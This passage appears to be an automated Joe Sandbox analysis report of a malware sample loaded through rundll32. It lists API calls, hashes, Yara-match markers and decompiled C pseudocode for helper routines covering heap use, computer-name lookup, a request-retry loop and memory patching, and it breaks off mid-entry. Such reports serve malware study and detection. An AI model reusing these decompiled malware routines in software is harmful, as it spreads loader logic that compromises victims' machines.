                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                • String ID:
                                • API String ID: 552344955-0
                                • Opcode ID: abfb30bddeeaa7b99e8d447a340bec3942e1c2a35536487e4e9b5af36f4d79fe
                                • Instruction ID: 58138fcab65638617a539901c1d4b75003d7e7538ac9b4abe7f7b7de3999fedb
                                • Opcode Fuzzy Hash: abfb30bddeeaa7b99e8d447a340bec3942e1c2a35536487e4e9b5af36f4d79fe
                                • Instruction Fuzzy Hash: C9115279900208ABDB11FFAAC854B9FBBB8EF95A54F24445EE4009F250DB748A45CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03489370 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,034802F2,69B25F44,?,?,00000000), ref: 034893AD
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,034802F2), ref: 0348940E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileFreeHeapSystem
                                • String ID:
                                • API String ID: 892271797-0
                                • Opcode ID: ca51c3b925cab6bd420947161fb5402f52c4d808c14d00be2dd0ff0806abe62f
                                • Instruction ID: 5b75dfeb66acc77658bbd3f765d387b790091f24f83c1dbfab02a7f4d9d7a8e7
                                • Opcode Fuzzy Hash: ca51c3b925cab6bd420947161fb5402f52c4d808c14d00be2dd0ff0806abe62f
                                • Instruction Fuzzy Hash: 57110AB9D00208FFCB11FBA9D945ADEB7FCAB18205F1440A7A902FA244D7749B48DB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431240 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 03431267
                                  • Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
                                • SafeArrayDestroy.OLEAUT32(?), ref: 034312B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ArraySafe$CreateDestroyFreeString
                                • String ID:
                                • API String ID: 3098518882-0
                                • Opcode ID: af671ccfef14402a67402800cc4cffc302e112d0eaf9e51f0f1eb53209adc728
                                • Instruction ID: 45fdbda7dfa6e6a3e4b0dae4723a0572e5850f80cb6d6e8a35943c80b00a1cf6
                                • Opcode Fuzzy Hash: af671ccfef14402a67402800cc4cffc302e112d0eaf9e51f0f1eb53209adc728
                                • Instruction Fuzzy Hash: 4D115275900209BFDB01EFA5D805EEEB7B9EF08750F008115EA04FB260E7759A158B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034314F1 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(03437283), ref: 0343150A
                                  • Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
                                • SysFreeString.OLEAUT32(00000000), ref: 0343154B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 5fb363bf26729fb404a1b2f803c3f5ce2b312ecb1d5a15bef45564be409dfbf3
                                • Instruction ID: 94c42948f38c0f180a0e76967c29888b3f738ac6c4622484898273a4ad0f8a7b
                                • Opcode Fuzzy Hash: 5fb363bf26729fb404a1b2f803c3f5ce2b312ecb1d5a15bef45564be409dfbf3
                                • Instruction Fuzzy Hash: F5016235500219BFDF41EFA9D905EEF7BB8EF48710B044126F909EB220D7709A15CBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034322D7 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E034322D7(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E03436D63(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E03436C2C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                0x034322dc
                                0x034322e7
                                0x034322e9
                                0x034322ef
                                0x034322f1
                                0x034322f6
                                0x034322ff
                                0x03432303
                                0x0343230c
                                0x03432310
                                0x0343231f
                                0x03432312
                                0x03432313
                                0x03432318
                                0x03432318
                                0x03432310
                                0x03432303
                                0x03432328

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,034357B5,00000000,00000000,?,75BCC740,034357B5), ref: 034322EF
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetComputerNameExA.KERNEL32(00000003,00000000,034357B5,034357B6,?,75BCC740,034357B5), ref: 0343230C
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: 6dc3de862436670141eb45c2246ae8b93120ce89f86eaa23f4843bc947674c52
                                • Instruction ID: e5b0a2949dd697c8c131d09ec84b104d5c4feb6166ff0d4aa5316cddf05a5554
                                • Opcode Fuzzy Hash: 6dc3de862436670141eb45c2246ae8b93120ce89f86eaa23f4843bc947674c52
                                • Instruction Fuzzy Hash: 53F05B26600205BAE711D666CC40FAF76FCDBCA550F15045AE944DB144D6F0DE018676
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034378BF Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034378BF(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E03436D63(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x343a348; // 0x21ad5a8
					_t5 = _t11 + 0x343ba70; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x343a348; // 0x21ad5a8
					_t6 = _t14 + 0x343b900; // 0x6d0063
					_t16 = E03437928(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E03436C2C(_t20);
				}
				return _t18;
			}









                                0x034378d5
                                0x034378d9
                                0x03437919
                                0x034378db
                                0x034378df
                                0x034378e6
                                0x034378ee
                                0x034378f4
                                0x034378ff
                                0x03437908
                                0x0343790e
                                0x03437910
                                0x03437910
                                0x0343791e

                                APIs
                                • lstrlenW.KERNEL32(76CDF710,00000000,?,034371A6,00000000,?,76CDF710,00000000,76CDF730), ref: 034378C5
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • wsprintfW.USER32 ref: 034378EE
                                  • Part of subcall function 03437928: memset.NTDLL ref: 0343794B
                                  • Part of subcall function 03437928: GetLastError.KERNEL32 ref: 03437997
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                • String ID:
                                • API String ID: 1672627171-0
                                • Opcode ID: d7c8b546a0314c8a8e775e880a53a54b8b049c68a0a61581fbf7e54f617a0b0c
                                • Instruction ID: 45ed328149938f632950a2a51feb9342e38cfd256a53c24db4956354604053ab
                                • Opcode Fuzzy Hash: d7c8b546a0314c8a8e775e880a53a54b8b049c68a0a61581fbf7e54f617a0b0c
                                • Instruction Fuzzy Hash: 52F02432100614AFD610EB65DC44FAB3BDCEF89710F064417FA84EF115C63098128B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E869 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 0348E873
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 0348E8AF
                                  • Part of subcall function 03471A0A: lstrlen.KERNEL32(?,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977,0348893A,?,?), ref: 03471A58
                                  • Part of subcall function 03471A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A6A
                                  • Part of subcall function 03471A0A: lstrcpy.KERNEL32(00000000,?), ref: 03471A79
                                  • Part of subcall function 03471A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A8A
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                • String ID:
                                • API String ID: 1872894792-0
                                • Opcode ID: 91203e4bb3514c6c37b5bb7c784aa85d3ce15a17eec797997df4ac604a02ff16
                                • Instruction ID: 6236308b0387554e4995f9fd059846aa0d59a9913fa955b34d484503936245e7
                                • Opcode Fuzzy Hash: 91203e4bb3514c6c37b5bb7c784aa85d3ce15a17eec797997df4ac604a02ff16
                                • Instruction Fuzzy Hash: 36F05C352012158FC730FF19948886DFB98EF89111326419FEC115F301C7315C8186D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347C9A9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • InterlockedIncrement.KERNEL32(0349A05C), ref: 0347C9BE
                                  • Part of subcall function 03482331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0348235C
                                  • Part of subcall function 03482331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 03482369
                                  • Part of subcall function 03482331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 034823F5
                                  • Part of subcall function 03482331: GetModuleHandleA.KERNEL32(00000000), ref: 03482400
                                  • Part of subcall function 03482331: RtlImageNtHeader.NTDLL(00000000), ref: 03482409
                                  • Part of subcall function 03482331: RtlExitUserThread.NTDLL(00000000), ref: 0348241E
                                • InterlockedDecrement.KERNEL32(0349A05C), ref: 0347C9E2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                • String ID:
                                • API String ID: 1011034841-0
                                • Opcode ID: 9cf3dc852f6cb143916e5dce2a01d9884c5b438516e849396fb7c551e8d70022
                                • Instruction ID: ca9eb06d22b10c3b840813bfe558d3b625b690268456d961560888d9f92df61c
                                • Opcode Fuzzy Hash: 9cf3dc852f6cb143916e5dce2a01d9884c5b438516e849396fb7c551e8d70022
                                • Instruction Fuzzy Hash: 3FE0D872248222DBDF62EB759884B9FBA54AB01680F15061BF945FC104C610CC50CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431CD6 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03431CD6(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x343a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x343a1c8 = GetTickCount();
				_t5 = E03436D78(_a4);
				if(_t5 == 0) {
					_t5 = E03434B89(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E03436B1C(_t9) != 0) {
							 *0x343a300 = 1; // executed
						}
						_t7 = E03433D2C(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                                0x03431cd6
                                0x03431cdf
                                0x03431ce5
                                0x03431cec
                                0x03431cf0
                                0x00000000
                                0x03431cf0
                                0x03431cfd
                                0x03431d02
                                0x03431d09
                                0x03431d0f
                                0x03431d16
                                0x03431d1f
                                0x03431d21
                                0x03431d21
                                0x03431d2b
                                0x00000000
                                0x03431d2b
                                0x03431d16
                                0x03431d30

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,03435E54,?), ref: 03431CDF
                                • GetTickCount.KERNEL32 ref: 03431CF3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CountCreateHeapTick
                                • String ID:
                                • API String ID: 2177101570-0
                                • Opcode ID: 1c6ef428e0cf35841068d6d3cdef35a160d02f097a10326f084c5f6bd9872785
                                • Instruction ID: 31787dd8e4c18fe31312426c71ce780e5d2b50df1906df30f88ab900d5eef2f3
                                • Opcode Fuzzy Hash: 1c6ef428e0cf35841068d6d3cdef35a160d02f097a10326f084c5f6bd9872785
                                • Instruction Fuzzy Hash: ABF06574240302AAEB10FB71AD4576A35E46B0F740F14482BE981EF284DBB5D0009A1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491DED Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348561D
                                  • Part of subcall function 034855E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 03485653
                                  • Part of subcall function 034855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348565F
                                  • Part of subcall function 034855E4: lstrcmpi.KERNEL32(?,00000000), ref: 0348569C
                                  • Part of subcall function 034855E4: StrChrA.SHLWAPI(?,0000002E), ref: 034856A5
                                  • Part of subcall function 034855E4: lstrcmpi.KERNEL32(?,00000000), ref: 034856B7
                                  • Part of subcall function 034855E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03485708
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,034960E0,0000002C,034890D3,06168E36,?,00000000,0348A484), ref: 03491E2C
                                  • Part of subcall function 0348A806: GetProcAddress.KERNEL32(?,00000000), ref: 0348A82F
                                  • Part of subcall function 0348A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03486230,00000000,00000000,00000028,00000100), ref: 0348A851
                                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,034960E0,0000002C,034890D3,06168E36,?,00000000,0348A484,?,00000318), ref: 03491EB7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                • String ID:
                                • API String ID: 4138075514-0
                                • Opcode ID: 761b6edb2596c110d5560c08e5410a01477b9dd30d3202bc05d085ce14ab6072
                                • Instruction ID: 625a179b33ef61e23ca5f201163615b4a2b8085fa41cacd44807edaad6f3f788
                                • Opcode Fuzzy Hash: 761b6edb2596c110d5560c08e5410a01477b9dd30d3202bc05d085ce14ab6072
                                • Instruction Fuzzy Hash: 8E21D075D01229EFDF11DFA6D884ADEBFB5BF09720F15812BE914BA250C3344A418FA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034918C0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,03490977,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034918D5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: d1e704bbd7a69b0790425a9c23ff103fc134ab082fc8f8b539aeef2683e7bfdf
                                • Instruction ID: ee26399b4bca0683c9ba261380920f31f6c58970da2e490ae4993595c7b2853c
                                • Opcode Fuzzy Hash: d1e704bbd7a69b0790425a9c23ff103fc134ab082fc8f8b539aeef2683e7bfdf
                                • Instruction Fuzzy Hash: 16318575A40206EFEF01EF99D4859AEBBF9FB45210F5844ABD205AF304C730A941CF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431C03 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E03431C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x343a2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                0x03431c08
                                0x03431c0d
                                0x03431c1b
                                0x03431c21
                                0x03431c25
                                0x03431c96
                                0x03431c27
                                0x03431c2b
                                0x03431c2e
                                0x03431c31
                                0x03431c38
                                0x03431c39
                                0x03431c3a
                                0x03431c3c
                                0x03431c41
                                0x03431c48
                                0x03431c4e
                                0x03431c4f
                                0x03431c4f
                                0x03431c56
                                0x03431c57
                                0x03431c58
                                0x03431c5c
                                0x03431c68
                                0x03431c6e
                                0x03431c6f
                                0x03431c6f
                                0x03431c71
                                0x03431c77
                                0x03431c79
                                0x03431c7e
                                0x03431c7f
                                0x03431c7f
                                0x03431c85
                                0x03431c8e
                                0x03431c90
                                0x03431c93
                                0x03431ca2

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03431C1B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: e5ef01e883eba7cb3d281ac79740f7e406c3b619802b519a7e2fa895b0da9e2f
                                • Instruction ID: a00b61df4224028d0a9ca441d353fff7bb956b0dd3e37a89296afc0c425287d0
                                • Opcode Fuzzy Hash: e5ef01e883eba7cb3d281ac79740f7e406c3b619802b519a7e2fa895b0da9e2f
                                • Instruction Fuzzy Hash: B811D631285344AFEB159F29D896BE9BBA9DB57358F18408BE4409F392C277850BC724
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03474A9F Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,034999DC,-0000000C,?,?,?,0348C01A,00000006,?,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 03474ADA
                                  • Part of subcall function 034774AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0349A400), ref: 034774C5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleInformationModuleProcessQuery
                                • String ID:
                                • API String ID: 2776635927-0
                                • Opcode ID: b3ac84fd2310d04eec244bd271d085b98d1e6e5da146ea67d5863ad9dc058efd
                                • Instruction ID: 59b670fcddd6e447a3c8a72b75e0a60eb21f703c335a44f2e99a6d7031997e35
                                • Opcode Fuzzy Hash: b3ac84fd2310d04eec244bd271d085b98d1e6e5da146ea67d5863ad9dc058efd
                                • Instruction Fuzzy Hash: A7218135600205AFDB21DF5BC494ABBB7E9EF48394768452FE9458F350D670ED01CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343375F Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0343375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x343a368; // 0x55e9618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E0343227F( &_v68) == 0) {
						goto L16;
					}
					_t30 = E03436954(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E03431CA5(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E0343A000 = E0343A000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E03434274( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x343a30c, 0) == 0x102);
				return _t30;
			}

















                                0x0343375f
                                0x03433765
                                0x0343376c
                                0x03433774
                                0x0343377a
                                0x0343377d
                                0x0343377f
                                0x0343377f
                                0x03433787
                                0x03433787
                                0x03433791
                                0x00000000
                                0x00000000
                                0x034337a0
                                0x034337a4
                                0x034337a8
                                0x034337ad
                                0x034337b1
                                0x034337ed
                                0x034337ef
                                0x034337ef
                                0x034337b3
                                0x034337ba
                                0x034337e4
                                0x034337bc
                                0x034337bc
                                0x034337c1
                                0x034337dd
                                0x034337c3
                                0x034337c3
                                0x034337c8
                                0x034337cd
                                0x034337d0
                                0x034337d2
                                0x034337d7
                                0x034337d9
                                0x034337d9
                                0x034337d7
                                0x034337c8
                                0x034337c1
                                0x034337ba
                                0x034337b1
                                0x034337fc
                                0x03433801
                                0x03433801
                                0x03433825

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,76CC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03433811
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 94a698a9a8576dc17ca1dd5cec89bbeacbfaec84778af4a445038ea9170e9c22
                                • Instruction ID: 28ace0b982531363573422712bcece9d46fb46d3ea14755a481bcccbc5eacb0d
